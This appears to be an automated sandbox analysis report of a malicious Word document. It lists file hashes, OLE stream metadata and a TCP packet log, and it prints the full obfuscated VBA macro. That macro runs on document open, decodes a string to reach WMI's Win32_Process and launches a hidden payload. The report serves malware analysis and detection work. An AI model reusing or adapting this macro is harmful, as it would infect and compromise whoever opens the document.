                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia., Author: Gabriel Villaseor, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 08:47:00 2021, Last Saved Time/Date: Mon Jan 25 08:47:00 2021, Number of Pages: 1, Number of Words: 5614, Number of Characters: 32003, Security: 8
                                                                    Entropy (8bit):6.195212513334959
                                                                    TrID:
                                                                    • Microsoft Word document (32009/1) 79.99%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                    File name:N00048481397007.doc
                                                                    File size:142848
                                                                    MD5:ad7db0f946bc5c3bb051cb04f359e6a4
                                                                    SHA1:24d54a6a1c4280b948fb245c97e4823d319eefe1
                                                                    SHA256:4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1
                                                                    SHA512:a4b34893134f12724a7fd951d552cf1c3dc2f2bb488506a3ed5e4a94b687e09881a0fe50e25af4de7f41274e8cba539169cda651c95f0c7f4b55d5aa5de6def4
                                                                    SSDEEP:1536:KNpHZTgQSz4w4K0vOYOcc2bqrQFfDngtWBj:y1gQSU3K0hzqrQFbKWBj

                                                                    File Icon

                                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OLE
                                                                    Number of OLE Files:1

                                                                    OLE File "N00048481397007.doc"

                                                                    Indicators

                                                                    Has Summary Info:True
                                                                    Application Name:Microsoft Office Word
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:True
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:True

                                                                    Summary

                                                                    Code Page:1252
                                                                    Title:Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia.
                                                                    Subject:
                                                                    Author:Gabriel Villaseor
                                                                    Keywords:
                                                                    Comments:
                                                                    Template:
                                                                    Last Saved By:
                                                                    Revision Number:1
                                                                    Total Edit Time:0
                                                                    Create Time:2021-01-25 08:47:00
                                                                    Last Saved Time:2021-01-25 08:47:00
                                                                    Number of Pages:1
                                                                    Number of Words:5614
                                                                    Number of Characters:32003
                                                                    Creating Application:Microsoft Office Word
                                                                    Security:8

                                                                    Document Summary

                                                                    Document Code Page:-535
                                                                    Number of Lines:266
                                                                    Number of Paragraphs:75
                                                                    Thumbnail Scaling Desired:False
                                                                    Company:Velzquez - Rodrquez
                                                                    Contains Dirty Links:False
                                                                    Shared Document:False
                                                                    Changed Hyperlinks:False
                                                                    Application Version:917504

                                                                    Streams with VBA

                                                                    VBA File Name: Gp0t5ucwnkng7fi, Stream Size: 14586
                                                                    General
                                                                    Stream Path:Macros/VBA/Gp0t5ucwnkng7fi
                                                                    VBA File Name:Gp0t5ucwnkng7fi
                                                                    Stream Size:14586

                                                                    VBA Code Keywords

                                                                    VBA Code
                                                                    Attribute VB_Name = "Gp0t5ucwnkng7fi"
                                                                    Function Xusmagx95iuck_o3o()
                                                                       GoTo snBUla
                                                                        Const AjzpdH As String = "A"
                                                                        Const jbkkjHHCd As String = ","
                                                                        Const yqmFHJvF As String = "*high*,*critic*"
                                                                        Dim FwMLnnSxs As Range: Set FwMLnnSxs = Array((AjzpdH), Target)
                                                                        If FwMLnnSxs Is Nothing Then
                                                                        End If
                                                                        Dim rnfVw() As String: rnfVw = Split(yqmFHJvF, jbkkjHHCd)
                                                                    snBUla:
                                                                    skuwd = Nkemmqfhxex + U765y5vgf_ao0faq . Content + Dt5ebejo9lypr_3vmp
                                                                       GoTo uUNTnPDJ
                                                                        Const wPuUI As String = "A"
                                                                        Const QNBiBDJF As String = ","
                                                                        Const TfZstIBWb As String = "*high*,*critic*"
                                                                        Dim GyemVIEQ As Range: Set GyemVIEQ = Array((wPuUI), Target)
                                                                        If GyemVIEQ Is Nothing Then
                                                                        End If
                                                                        Dim kTIuCnPI() As String: kTIuCnPI = Split(TfZstIBWb, QNBiBDJF)
                                                                    uUNTnPDJ:
                                                                    mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
                                                                    I8bgyvyef5pdaj7_v = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
                                                                       GoTo dtPsGEOG
                                                                        Const mQUInscCB As String = "A"
                                                                        Const PmHbFtBA As String = ","
                                                                        Const NxyDdD As String = "*high*,*critic*"
                                                                        Dim ENgVDEnDI As Range: Set ENgVDEnDI = Array((mQUInscCB), Target)
                                                                        If ENgVDEnDI Is Nothing Then
                                                                        End If
                                                                        Dim TmgVHr() As String: TmgVHr = Split(NxyDdD, PmHbFtBA)
                                                                    dtPsGEOG:
                                                                    A3hie1o1mwdgk_9_ = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
                                                                       GoTo bwTdFGH
                                                                        Const ZcbWFy As String = "A"
                                                                        Const jmprxcAGG As String = ","
                                                                        Const uwcdCFcFJ As String = "*high*,*critic*"
                                                                        Dim GhFhH As Range: Set GhFhH = Array((ZcbWFy), Target)
                                                                        If GhFhH Is Nothing Then
                                                                        End If
                                                                        Dim auKzIlBI() As String: auKzIlBI = Split(uwcdCFcFJ, jmprxcAGG)
                                                                    bwTdFGH:
                                                                    Bn1mqobqcygrsk1zn = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
                                                                       GoTo FCnAjUBF
                                                                        Const upIoDlhH As String = "A"
                                                                        Const BZLGJ As String = ","
                                                                        Const DpdIEHHc As String = "*high*,*critic*"
                                                                        Dim yifdCzUX As Range: Set yifdCzUX = Array((upIoDlhH), Target)
                                                                        If yifdCzUX Is Nothing Then
                                                                        End If
                                                                        Dim vmuBOT() As String: vmuBOT = Split(DpdIEHHc, BZLGJ)
                                                                    FCnAjUBF:
                                                                    Acbncig4c2s9p = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
                                                                       GoTo dmJpUJBT
                                                                        Const LFmsHlGJO As String = "A"
                                                                        Const VlJBAxsF As String = ","
                                                                        Const DReLBGD As String = "*high*,*critic*"
                                                                        Dim IUtVX As Range: Set IUtVX = Array((LFmsHlGJO), Target)
                                                                        If IUtVX Is Nothing Then
                                                                        End If
                                                                        Dim LgSUu() As String: LgSUu = Split(DReLBGD, VlJBAxsF)
                                                                    dmJpUJBT:
                                                                    C4s8ozri2fdnbsu4 = Bn1mqobqcygrsk1zn + Acbncig4c2s9p + A3hie1o1mwdgk_9_ + mjbBYHhbs + I8bgyvyef5pdaj7_v
                                                                       GoTo cskzymBH
                                                                        Const QttEc As String = "A"
                                                                        Const sInuFuLII As String = ","
                                                                        Const ybkwIF As String = "*high*,*critic*"
                                                                        Dim YYiqHCrBJ As Range: Set YYiqHCrBJ = Array((QttEc), Target)
                                                                        If YYiqHCrBJ Is Nothing Then
                                                                        End If
                                                                        Dim jEGWECK() As String: jEGWECK = Split(ybkwIF, sInuFuLII)
                                                                    cskzymBH:
                                                                    Eqhw188dzwgnq = Zr9iedzfw6nr(C4s8ozri2fdnbsu4)
                                                                       GoTo GKCGI
                                                                        Const JNPIBwzJy As String = "A"
                                                                        Const xJhvfW As String = ","
                                                                        Const MtSXGFAwF As String = "*high*,*critic*"
                                                                        Dim CtnVB As Range: Set CtnVB = Array((JNPIBwzJy), Target)
                                                                        If CtnVB Is Nothing Then
                                                                        End If
                                                                        Dim QFCSIz() As String: QFCSIz = Split(MtSXGFAwF, xJhvfW)
                                                                    GKCGI:
                                                                    Set Ixvxtuve66zxo = VBA.GetObject(Eqhw188dzwgnq)
                                                                       GoTo OQtflfHc
                                                                        Const vXvXQH As String = "A"
                                                                        Const BBnudDV As String = ","
                                                                        Const AnoeDGEY As String = "*high*,*critic*"
                                                                        Dim nUxeKfi As Range: Set nUxeKfi = Array((vXvXQH), Target)
                                                                        If nUxeKfi Is Nothing Then
                                                                        End If
                                                                        Dim LJgRGnI() As String: LJgRGnI = Split(AnoeDGEY, BBnudDV)
                                                                    OQtflfHc:
                                                                    mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
                                                                    pqwm = Zr9iedzfw6nr(mxkikw)
                                                                       GoTo zImEIFI
                                                                        Const TYMfJE As String = "A"
                                                                        Const ppqanE As String = ","
                                                                        Const zzXfBb As String = "*high*,*critic*"
                                                                        Dim YXgZLBuTI As Range: Set YXgZLBuTI = Array((TYMfJE), Target)
                                                                        If YXgZLBuTI Is Nothing Then
                                                                        End If
                                                                        Dim qJJnPFoNQ() As String: qJJnPFoNQ = Split(zzXfBb, ppqanE)
                                                                    zImEIFI:
                                                                    Ixvxtuve66zxo.Create pqwm, S2xsub800b7, Tl85j6j2gy2n7qad
                                                                       GoTo LcJWChpF
                                                                        Const uFHXMGsDH As String = "A"
                                                                        Const wbcoCJA As String = ","
                                                                        Const UupSwG As String = "*high*,*critic*"
                                                                        Dim IfvyDH As Range: Set IfvyDH = Array((uFHXMGsDH), Target)
                                                                        If IfvyDH Is Nothing Then
                                                                        End If
                                                                        Dim HfUXFJwF() As String: HfUXFJwF = Split(UupSwG, wbcoCJA)
                                                                    LcJWChpF:
                                                                    End Function
                                                                    Function Zr9iedzfw6nr(Pdkbu8b4a_ucmmy2)
                                                                    On Error Resume Next
                                                                       GoTo XDCYoHErU
                                                                        Const OtpOArK As String = "A"
                                                                        Const mbLvUI As String = ","
                                                                        Const iJkmJG As String = "*high*,*critic*"
                                                                        Dim uHhldyVW As Range: Set uHhldyVW = Array((OtpOArK), Target)
                                                                        If uHhldyVW Is Nothing Then
                                                                        End If
                                                                        Dim OAFQFBEFa() As String: OAFQFBEFa = Split(iJkmJG, mbLvUI)
                                                                    XDCYoHErU:
                                                                    N21io7rxzal10t = Pdkbu8b4a_ucmmy2
                                                                       GoTo PDgjIDCIF
                                                                        Const vQbVHTJ As String = "A"
                                                                        Const SRadpEcF As String = ","
                                                                        Const mbdQXnNAJ As String = "*high*,*critic*"
                                                                        Dim ZhuxR As Range: Set ZhuxR = Array((vQbVHTJ), Target)
                                                                        If ZhuxR Is Nothing Then
                                                                        End If
                                                                        Dim xcFaA() As String: xcFaA = Split(mbdQXnNAJ, SRadpEcF)
                                                                    PDgjIDCIF:
                                                                    L4jc0swehya = Sotm_c8dqxel(N21io7rxzal10t)
                                                                       GoTo zPYsAGBC
                                                                        Const gPxXF As String = "A"
                                                                        Const vMqQFsCmr As String = ","
                                                                        Const IcBqyoTE As String = "*high*,*critic*"
                                                                        Dim UTUqCwyI As Range: Set UTUqCwyI = Array((gPxXF), Target)
                                                                        If UTUqCwyI Is Nothing Then
                                                                        End If
                                                                        Dim MNzdmO() As String: MNzdmO = Split(IcBqyoTE, vMqQFsCmr)
                                                                    zPYsAGBC:
                                                                    Zr9iedzfw6nr = L4jc0swehya
                                                                       GoTo mFRDA
                                                                        Const huzCVaAnM As String = "A"
                                                                        Const nmoAspl As String = ","
                                                                        Const AEpDpJGH As String = "*high*,*critic*"
                                                                        Dim EZSQT As Range: Set EZSQT = Array((huzCVaAnM), Target)
                                                                        If EZSQT Is Nothing Then
                                                                        End If
                                                                        Dim aEMwHJJ() As String: aEMwHJJ = Split(AEpDpJGH, nmoAspl)
                                                                    mFRDA:
                                                                    End Function
                                                                    Function Sotm_c8dqxel(Tw8vu7dybjhd)
                                                                       GoTo eRlxboGG
                                                                        Const UrnhFG As String = "A"
                                                                        Const AeZXCL As String = ","
                                                                        Const LYEtDJDB As String = "*high*,*critic*"
                                                                        Dim MvCNCxeRC As Range: Set MvCNCxeRC = Array((UrnhFG), Target)
                                                                        If MvCNCxeRC Is Nothing Then
                                                                        End If
                                                                        Dim jqLUKf() As String: jqLUKf = Split(LYEtDJDB, AeZXCL)
                                                                    eRlxboGG:
                                                                       GoTo DJesE
                                                                        Const bTSPCh As String = "A"
                                                                        Const eJIkEagfC As String = ","
                                                                        Const XfKDE As String = "*high*,*critic*"
                                                                        Dim eFfcEAI As Range: Set eFfcEAI = Array((bTSPCh), Target)
                                                                        If eFfcEAI Is Nothing Then
                                                                        End If
                                                                        Dim jKGrEhAE() As String: jKGrEhAE = Split(XfKDE, eJIkEagfC)
                                                                    DJesE:
                                                                       GoTo xdoxB
                                                                        Const rlKxF As String = "A"
                                                                        Const TziQbRH As String = ","
                                                                        Const VVDiBADws As String = "*high*,*critic*"
                                                                        Dim nQutDRr As Range: Set nQutDRr = Array((rlKxF), Target)
                                                                        If nQutDRr Is Nothing Then
                                                                        End If
                                                                        Dim rQMlbCDj() As String: rQMlbCDj = Split(VVDiBADws, TziQbRH)
                                                                    xdoxB:
                                                                    Sotm_c8dqxel = Replace(Tw8vu7dybjhd, "ns w" + "u db nd", He0e1df114_gsl7i)
                                                                       GoTo VZXgAzj
                                                                        Const rwAdJC As String = "A"
                                                                        Const HzpNhFB As String = ","
                                                                        Const buaHCHyIN As String = "*high*,*critic*"
                                                                        Dim KJKIF As Range: Set KJKIF = Array((rwAdJC), Target)
                                                                        If KJKIF Is Nothing Then
                                                                        End If
                                                                        Dim xMeNBMA() As String: xMeNBMA = Split(buaHCHyIN, HzpNhFB)
                                                                    VZXgAzj:
                                                                       GoTo XxDunFI
                                                                        Const SdueDATuJ As String = "A"
                                                                        Const wAZjcaDbE As String = ","
                                                                        Const TQutDNlhF As String = "*high*,*critic*"
                                                                        Dim ZtlVi As Range: Set ZtlVi = Array((SdueDATuJ), Target)
                                                                        If ZtlVi Is Nothing Then
                                                                        End If
                                                                        Dim yVlwI() As String: yVlwI = Split(TQutDNlhF, wAZjcaDbE)
                                                                    XxDunFI:
                                                                       GoTo cCNkM
                                                                        Const SOBiDVBG As String = "A"
                                                                        Const uQDVbE As String = ","
                                                                        Const LXmiCH As String = "*high*,*critic*"
                                                                        Dim zgEErH As Range: Set zgEErH = Array((SOBiDVBG), Target)
                                                                        If zgEErH Is Nothing Then
                                                                        End If
                                                                        Dim KDRcGw() As String: KDRcGw = Split(LXmiCH, uQDVbE)
                                                                    cCNkM:
                                                                    End Function
                                                                    VBA File Name: Ht_h_pv5qq7taeoe3a, Stream Size: 705
                                                                    General
                                                                    Stream Path:Macros/VBA/Ht_h_pv5qq7taeoe3a
                                                                    VBA File Name:Ht_h_pv5qq7taeoe3a
                                                                    Stream Size:705

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    Attribute
                                                                    VB_Name
                                                                    VBA Code
                                                                    Attribute VB_Name = "Ht_h_pv5qq7taeoe3a"
                                                                    VBA File Name: U765y5vgf_ao0faq, Stream Size: 1173
                                                                    General
                                                                    Stream Path:Macros/VBA/U765y5vgf_ao0faq
                                                                    VBA File Name:U765y5vgf_ao0faq
                                                                    Stream Size:1173

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    False
                                                                    Private
                                                                    VB_Exposed
                                                                    Attribute
                                                                    VB_Name
                                                                    VB_Creatable
                                                                    Document_open()
                                                                    VB_PredeclaredId
                                                                    VB_GlobalNameSpace
                                                                    VB_Base
                                                                    VB_Customizable
                                                                    VB_TemplateDerived
                                                                    VBA Code
                                                                    Attribute VB_Name = "U765y5vgf_ao0faq"
                                                                    Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    Private Sub Document_open()
                                                                    Xusmagx95iuck_o3o
                                                                    End Sub

                                                                    Streams

                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                    General
                                                                    Stream Path:\x1CompObj
                                                                    File Type:data
                                                                    Stream Size:146
                                                                    Entropy:4.00187355764
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 316
                                                                    General
                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                    File Type:data
                                                                    Stream Size:316
                                                                    Entropy:3.13931601016
                                                                    Base64 Encoded:False
                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                                                    General
                                                                    Stream Path:\x5SummaryInformation
                                                                    File Type:data
                                                                    Stream Size:520
                                                                    Entropy:3.91439426516
                                                                    Base64 Encoded:False
                                                                    Stream Path: 1Table, File Type: data, Stream Size: 6885
                                                                    General
                                                                    Stream Path:1Table
                                                                    File Type:data
                                                                    Stream Size:6885
                                                                    Entropy:6.0189512257
                                                                    Base64 Encoded:True
                                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                                    General
                                                                    Stream Path:Macros/PROJECT
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Stream Size:527
                                                                    Entropy:5.52643349927
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I D = " { 3 4 8 2 5 3 8 1 - 3 9 1 5 - 4 2 D 7 - B C E B - D B 4 B F 3 B 3 B 9 D 0 } " . . D o c u m e n t = U 7 6 5 y 5 v g f _ a o 0 f a q / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H t _ h _ p v 5 q q 7 t a e o e 3 a . . M o d u l e = G p 0 t 5 u c w n k n g 7 f i . . E x e N a m e 3 2 = " H n g q q _ v j w m d " . . N a m e = " $ $ " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 E 2 C C 8 F 6 4 8 3 E 2 8 4 2 2 8 4 2 2 8 4 2 2 8 4 2 "
                                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158
                                                                    General
                                                                    Stream Path:Macros/PROJECTwm
                                                                    File Type:data
                                                                    Stream Size:158
                                                                    Entropy:3.75971549021
                                                                    Base64 Encoded:False
                                                                    Data ASCII:U 7 6 5 y 5 v g f _ a o 0 f a q . U . 7 . 6 . 5 . y . 5 . v . g . f . _ . a . o . 0 . f . a . q . . . H t _ h _ p v 5 q q 7 t a e o e 3 a . H . t . _ . h . _ . p . v . 5 . q . q . 7 . t . a . e . o . e . 3 . a . . . G p 0 t 5 u c w n k n g 7 f i . G . p . 0 . t . 5 . u . c . w . n . k . n . g . 7 . f . i . . . . .
                                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4832
                                                                    General
                                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                                    File Type:data
                                                                    Stream Size:4832
                                                                    Entropy:5.49501263006
                                                                    Base64 Encoded:True
                                                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 643
                                                                    General
                                                                    Stream Path:Macros/VBA/dir
                                                                    File Type:data
                                                                    Stream Size:643
                                                                    Entropy:6.34732268372
                                                                    Base64 Encoded:True
                                                                    Stream Path: WordDocument, File Type: data, Stream Size: 97248
                                                                    General
                                                                    Stream Path:WordDocument
                                                                    File Type:data
                                                                    Stream Size:97248
                                                                    Entropy:6.56028805033
                                                                    Base64 Encoded:True
                                                                    Stream Path: word, File Type: data, Stream Size: 435
                                                                    General
                                                                    Stream Path:word
                                                                    File Type:data
                                                                    Stream Size:435
                                                                    Entropy:7.51532274815
                                                                    Base64 Encoded:False

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                    Jan 26, 2021 06:54:58.480844975 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.480878115 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480954885 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.481201887 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.481565952 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481616020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481659889 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481697083 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481738091 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481740952 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.482446909 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482491016 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482528925 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482544899 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.482568979 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482595921 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.482609987 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483315945 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483355999 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483403921 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483407021 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.483448029 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483485937 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483552933 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.483618975 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.484200001 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484242916 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484281063 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484321117 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484335899 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.484359026 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484400988 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.485097885 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485140085 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485177994 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485239983 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485240936 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.485280037 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485348940 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.485970020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486012936 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486057997 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486100912 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486104012 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.486140966 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486212969 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.486268044 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.494196892 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494256020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494296074 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494337082 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494376898 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494426966 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494434118 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.494463921 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.494471073 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494501114 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494560957 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496171951 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496227980 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496269941 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496282101 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496310949 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496361017 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496371984 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496439934 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496458054 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496499062 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496539116 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496577024 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496581078 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496618986 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496655941 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.497348070 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497420073 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497458935 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497498989 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497514963 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.497540951 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497612000 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.498254061 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498296976 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498337030 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498374939 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498378992 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.498414993 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498487949 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.499063015 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.499103069 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.499186993 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.499397993 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535517931 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535577059 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535614967 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535655022 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535692930 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535712004 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535742044 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535758972 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535785913 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535825014 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535831928 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535865068 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535906076 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535907030 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535943985 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535984039 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535986900 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536015034 CET44349170192.0.78.20192.168.2.22
